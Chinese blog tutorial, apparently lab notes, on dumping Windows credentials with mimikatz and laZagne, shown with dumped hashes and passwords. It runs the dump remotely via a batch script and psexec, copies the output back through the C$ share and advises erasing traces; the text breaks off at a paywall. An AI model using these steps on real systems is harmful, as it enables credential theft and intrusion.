51-52Windows密码安全性测试与Windows提权

已于 2024-06-19 20:00:04 修改
阅读量1.4k 收藏 23
点赞数 36
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 网络安全 测试工具 windows 安全
于 2024-06-19 11:43:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42321190/article/details/139660898
版权

目录

Windows密码安全性测试

一、本地管理员密码如何直接提取

1、直接通过mimikatz读取管理员密码

2、使用laZagne工具读取管理员密码

二、利用Hash远程登录系统

 window提权

三、远程webshell执行命令解决

不能执行原因:

解决方法:单独上传cmd.exe到有读写权限目录执行。

1、网站目录寻找有读写权限目录

2、上传cmd.exe到读写权限目录

四、提权

1、菜刀提权

使用MS09-012漏洞

 2、msf提权

Windows密码安全性测试

一、本地管理员密码如何直接提取

需把读取管理员密码的工具上传到目标主机后(通过低权限账户访问、利用漏洞等)执行工具里的批处理脚本生成文本文件,下载文本文件获取到管理员密码。

1、直接通过mimikatz读取管理员密码

1.1使用【mimikatz】命令行工具提权:

正常情况下通过webshell上传【mimikatz】工具包,在运行批处理脚本生成读取管理员密码的文档。

此处先用命令行进行演示:

【mimikatz】放到C盘下,cmd切换到32位目录下运行mimikatz.exe:

运行步骤: 

cmd切换到目录下:
cd C:\mimikatz\Win32

运行程序:
mimikatz.exe

提升权限privilege::debug:
mimikatz # privilege::debug
Privilege '20' OK

抓取密码sekurlsa::logonpassWords:
mimikatz # sekurlsa::logonpassWords

 获取到密码:

输出结果:
Authentication Id : 0 ; 80142 (00000000:0001390e)
Session           : Service from 0
User Name         : Administrator
Domain            : OLDBOY-F74D04FE
Logon Server      : OLDBOY-F74D04FE
Logon Time        : 2024-5-28 21:30:53
SID               : S-1-5-21-919573472-2361006267-3082311417-500
        msv :
         [00000002] Primary
         * Username : Administrator
         * Domain   : OLDBOY-F74D04FE
         * LM       : 44efce164ab921caaad3b435b51404ee
         * NTLM     : 32ed87bdb5fdc5e9cba88547376818d4
         * SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
        wdigest :
         * Username : Administrator
         * Domain   : OLDBOY-F74D04FE
         * Password : 123456
        kerberos :
         * Username : Administrator
         * Domain   : OLDBOY-F74D04FE
         * Password : 123456
        ssp :
        credman :

 批处理方式:

新建aaa.bat批处理文件并写入123.txt文件,批处理文件内容如下:

mimikatz.exe "privilege::debug" "sekurlsa::logonpassWords" exit>123.txt

 远程获取目标主机密码大致方法:

准备阶段

  1. 选择合适的工具:选择一个适合提取密码的工具,如Mimikatz。确保该工具适用于目标系统的操作系统版本。

  2. 编写批处理脚本:创建一个批处理脚本(passwords.bat文件),用于自动化执行密码提取和结果保存过程。例如:

mimikatz.exe privilege::debug sekurlsa::logonpasswords > passwords.txt

这段脚本首先提升Mimikatz的权限,然后执行密码提取命令,并将输出重定向到passwords.txt文件中。

上传与执行

  1. 上传工具和脚本:使用您已有的访问权限(如低权限账户、已知漏洞等),将Mimikatz可执行文件和上述批处理脚本上传到目标主机。可以使用copy命令(通过命令行)、SCP、SMB共享或其他文件传输方法。

  2. 执行批处理脚本

    通过远程桌面、PsExec、PowerShell Remoting或计划任务等方式,远程执行上传的批处理脚本。例如,如果脚本位于C:\temp\passwords.bat,可以通过PsExec执行:

psexec \\target_ip -u low_privilege_user -p password C:\temp\passwords.bat

  • psexec: 使用PsExec工具,这是一个轻量级的telnet-replacement,可以远程执行命令行程序。
  • \\target_ip: 指定目标计算机的IP地址。
  • -u low_privilege_user -p password: 分别指定了用于远程登录目标计算机的低权限用户名和密码。
  • C:\temp\extract_passwords.bat: 指定在目标计算机上要执行的批处理脚本的完整路径。

下载结果

  1. 下载密码文件:一旦批处理脚本执行完成,会在指定位置生成包含密码信息的文本文件(在这个例子中是passwords.txt)。使用与上传时相同或类似的方法,将此文件下载回你的工作站进行分析。

copy \\target_ip\C$\temp\passwords.txt C:\local_download\

  • copy: 这是Windows命令行中用于复制文件的命令。
  • \\target_ip\C$: 这部分指定了网络路径,其中\\target_ip是目标计算机的IP地址,\C$是Windows系统默认的管理员共享,允许你访问目标计算机的C盘根目录。这要求你有相应的网络访问权限和认证信息。
  • temp\passwords.txt: 表示在目标计算机C盘的temp目录下名为passwords.txt的文件,这是你要复制的源文件。
  • C:\local_download\: 这是目标路径,即你希望在本地计算机上存放复制文件的位置。请确保该目录事先存在,否则命令可能会失败。

清理与报告

  1. 清理痕迹:为了减少被目标系统管理员发现的风险,考虑在操作完成后删除上传的工具、脚本和生成的密码文件。

  2. 分析与报告:在安全的环境中分析下载的密码文件,提取所需信息,并根据测试或审计需求准备相应的报告。

2、使用laZagne工具读取管理员密码

cmd里切换到目录:
cd C:\lan\lan2

运行:
laZagne.exe

-------

positional arguments:
  {chats,svn,all,wifi,mails,windows,database,sysadmin,browsers}
                        Choose a main command
    chats               Run chats module #运行聊天模块
    svn                 Run svn module #运行SVN版本控制系统模块
    all                 Run all modules #运行所有模块
    wifi                Run wifi module #运行无线网络相关模块
    mails               Run mails module #运行邮件管理模块
    windows             Run windows module #运行针对Windows系统的模块
    database            Run database module #运行数据库操作模块
    sysadmin            Run sysadmin module #运行系统管理员相关模块
    browsers            Run browsers module #运行浏览器相关模块

使用所有模块:
laZagne.exe all
追加到1.txt:
laZagne.exe all >>1.txt

 输出结果:


|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================&#
最低0.47元/天 解锁文章
本地加密传输测试-业务安全测试实操(2)
AI
06-12 1339
3个测试点:加密传输,session会话,session注销会话
从mimikatz抓取密码学习攻防
hongduilanjun的博客
07-21 1942
前不久在使用mimikatz抓取hash的时候遇到了报错,本着追根溯源的原则去查看了mimikatz抓取密码的原理。在学习的过程中发现了mimikatz的每种报错都有不同的原因,本文就从mimikatz的防御角度出发来分析如何防御mimikatz抓取密码。...
Windows密码凭证获取
2301_80361487的博客
07-05 1935
数据库,包括有关域用户,组和组成员身份的信息。文件,会示文件被系统占用,所以常规的复制下载方法是无法获取到文件副本的,因此需要通过特殊方法来获取。这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相。,一般翻译做散列,或音译为哈希,所谓哈希,就是使用一种加密函数进行计算后的结果。数据库用户密码跟其它数据库用户密码一样,在应用系统代码中都是以明文出现的,在获取文件。哈希是由用户输入的密码本地计算得出的,所以在这个步骤中,只要能供正确的 NTLM。
升】windows平台-项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2886
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
系列(一)----Windows Service 服务器初识exp,mysql
fendo
03-29 2万+
一、 二、Windwos常见
windows密码安全性测试
weixin_46248422的博客
07-26 1640
1.、直接通过mimikatz读取管理员密码 :可以在cs里面找到这个工具,但是它只能读操作系统的密码。lazagne工具可以读所有密码(浏览器、操作系统、邮件系统的密码)。 找到.exe文件,然后放到c盘目录下: 第一条:privilege::debug //限 第二条:sekurlsa::logonpa ssWords //抓取密码 2.本地hash远程攻击:只能在低版本的kali机上才能成功。在解密不了的情况下使用这种方法。...
【愚公系列】2024年03月 《网络安全应急管理技术实践》 021-网络安全应急技术实践(主机层-Windows 检查演练)
热门推荐
时光隧道
02-14 9万+
网络安全Windows检查演练是指对Windows操作系统进行一系列测试和检查的过程,旨在评估系统的安全性、发现存在的安全漏洞和风险,并采取相应的措施加以修复和强化。该演练通常由安全专家或团队负责进行,其目的是确保系统的网络安全措施得到有效实施,以减少系统被攻击、数据泄露或服务中断的风险。在网络安全Windows检查演练中,安全专家会使用各种工具和技术,如漏洞扫描、强密码测试、网络流量监控等,对Windows操作系统进行全面的检查。
系统之:Windows
f_carey的博客
11-04 3038
郑重声明: 本笔记编写目的只用于安全知识升,并更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 1 利用漏洞1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误2.1 系统服务限配置错误2.1.1 利用 Po.
运维知识点-Windows操作系统-cmd/Dos批处理bat命令脚本手册
aming小老弟
11-17 2229
注释输入和输出变量条件判断循环跳转函数DOS命令CurlTelnet添加账号并加入管理员组添加用户至远程桌面组允许修改密码关闭防火墙获取系统和版本信息显示本地或远程机器上当前运行的进程列表。操作系统 服务命令列表chkdsk.exe 磁盘检查开3389端口systeminfo获取NETBIOS主机名ping 测试网络连接net computer 添加或者删除域数据库中的计算机,telnet命令进行远程登陆使用ftp命令进行数据传输使用netstat命令查看网络连接的相关信息。
学习之旅—Windows操作系统如何限,网络安全零基础入门到精通实战教程!
最新发布
qq_41314882的博客
01-21 1170
了解基础知识之后,这次就来仔细学一下Windows操作系统的Windows的大致方向,拿到一个低限时要进行,首先要清楚从哪里入手,清楚了的大致方向,才能事半功倍。
Windwos密码导出的几种姿势
Matthew
09-14 1万+
这篇文章主要是介绍怎么在本地取用户密码,把知识整理了一下,把知识整理起来的威力还是挺大的。以下的方式分为要免杀和不需要免杀的方式。文章介绍的技术具有一定的攻击性,主要用于学习。 要免杀: 1.Getapss Getapss是由闪电小子根据mimikatz编译的一个工具,可以获取明文密码。现在有32位和64位了,直接运行getpass.exe。 2.QuarksPwDu
Windows和linux方法,WindowsLinux本地用户
weixin_28829325的博客
05-07 830
无论是Windows系统还是Linux系统都是基于限控制的,其严格的用户等级和限是系统安全的有力保证。这么严密的用户限是否不可逾越呢?下面笔者反其道而行之进行Windows及Linux下的测试。 一、windows下获取至高限 大家知道,在Windows系统中SYSTEM是无论是Windows系统还是Linux系统都是基于限控制的,其严格的用户等级和限是系统安全的有力保证。这么严密...
| Windows系统
本散修的一些学习心得与笔记,道友请自便。
10-23 1348
篇:Windows系统常见姿势。
「第一章」安全世界观
hacckjacking
01-22 398
批注 [……] 表示他人、自己、网络批注 参考资料来源于 * 书中批注 * 优快云 * GitHub * Google * 维基百科 * YouTube * MDN Web Docs 由于编写过程中无法记录所有的URL 所以如需原文,请自行查询 {……} 重点内容 *……* 表示先前到的内容,不赘述 「第一篇」世界观安全 「0.6本书结构」 本篇是签署的纲领,在此篇中阐述了一些安全的历史(本笔记并未出)..
渗透技巧——通过cmd上传文件的N种方法
citelao的博客
04-08 8004
渗透技巧——通过cmd上传文件的N种方法 三好学生 · 2016/04/05 10:23 0x00 前言 在渗透测试的过程中,常常需要向目标主机上传文件,我在最近的学习测试过程中就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。 图片来自于http://www.telegraph.co.uk/news
渗透测试--Windows
songbai220
12-11 890
Windows 常见方法 溢出漏洞(系统) 数据库 第三方应用软件 CMD命令无法执行的原因分析 1、主要原因是CMD.exe被管理员降或者删除,也有可能是组件被删除 2、解决办法通过脚本木马查找可读写目录,上传cmd.exe,调用cmd路径执行命令(找可读写目录不要选带空格的 菜刀设置cmd路径命令:setp c:\wmpub\cmd.exe 常用命令 whoami 查看用户限 systeminfo 查看操作系统,补丁情况 ipconfig 查看当前服务器IP i
ms10_018漏洞利用实践
Sn1P3r的博客
03-13 1987
0x01 实验环境 攻击机:kali2018 靶机:Win XP SP3 英文版 0x02 实践过程 1.启动metasploit,search目标模块ms10_018 2.use第一个模块 exploit/windows/browser/ms10_018_ie_behaviors 3.设置反向链接 4.查看配置 5.设置web服务器地址以及被攻击后的反...
Metasploit -- 内网渗透(ms10_002)
Web安全工具库
05-28 1465
我们总以为,是生活欠我们一个满意,其实,是我们欠生活一个努力。。。。 ---- 网易云热评 一、漏洞介绍 ms10_002漏洞,它是IE浏览器漏洞,也称“极光漏洞”,可以通过该漏洞获取目标主机的控制,。 二、攻击过程(目标主机是xp系统) 1、启动msf,搜索ms10_002 search ms10_002 2、选择模块use exploit/windows/browser/ms10_002_aurora 3、设置payload,set payloadwindows/meterpre.
渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析
joke_ljh的博客
08-31 4902
渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析 漏洞利用及其原理分析 在前面已经讲了利用metaspolit工具利用ms08-067漏洞进行的内网渗透,但是假如你要渗透的对象和你不在同一个局域网,那怎么办?你是不可能攻击到内网的主机,那我们可以想办法让它出来,让它出来主动我们建立连接。 我们可以利用ms10-002漏洞来进行渗透,它是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

XLbb:

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值